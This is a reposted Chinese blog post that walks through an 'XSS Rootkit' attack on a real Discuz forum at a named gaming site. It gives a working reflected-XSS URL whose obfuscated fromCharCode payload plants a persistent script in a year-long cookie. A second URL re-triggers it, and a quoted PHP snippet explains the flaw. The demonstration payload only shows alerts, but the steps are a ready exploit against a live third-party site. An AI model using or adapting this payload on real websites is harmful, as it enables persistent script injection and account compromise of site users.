网站地图    收藏   

主页 > 后端 > 网站安全 >

XSS ROOTKIT实战 - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-17 14:47 作者: 阅读:

[导读] 今天发了深掘XSS漏洞场景之XSS Rootkit:http://www.2cto.com/Article/201110/107620.html不过感觉还是不过瘾,不丢点实战的东西,别人容易看不懂,所以抽个网站来实战测试一番。我拿一个DISCUZ的非...

今天发了深掘XSS漏洞场景之XSS Rootkit:http://www.2cto.com/Article/201110/107620.html

不过感觉还是不过瘾,不丢点实战的东西,别人容易看不懂,所以抽个网站来实战测试一番。

我拿一个DISCUZ的非持久型XSS测试,IE8会拦截,所以需要关闭XSS筛选器才能成功,另外用了网易的网站测试,请网易的同学多包涵。

1.第一步访问下面的URL来安装XSS Rootkit。(复制粘贴URL访问,百度过滤了URL中的关键字)

http://bbs.game.163.com/logging.php?action=logout&referer=javascript:eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,106,97,118,97,115,99,114,105,112,116,58,97,108,101,114,116,40,47,120,115,115,47,41,39,59,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,114,101,102,101,114,101,114,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,32,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))&formhash=rootkit

 


2.关闭浏览器,重新访问下面的URL,可以事先看到效果。

http://bbs.game.163.com/logging.php?action=logout&formhash=testvul

 

 

3.由于DISCUZ注册变量的顺序是CPG,不能影响已经GET注册了的变量,同时在登录状态下点退出,将使用有效的formhash,该处referer取的是已初始化的变量,这个XSS漏洞将失效,所以我们的XSS Rootkit实战还是打了点折扣,但是其他的WEB程序呢 :)

foreach(array('_COOKIE', '_POST', '_GET') as $_request) {
 foreach($$_request as $_key => $_value) {
  $_key{0} != '_' && $$_key = daddslashes($_value);
 }
}

作者:RAyh4c的黑盒子

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论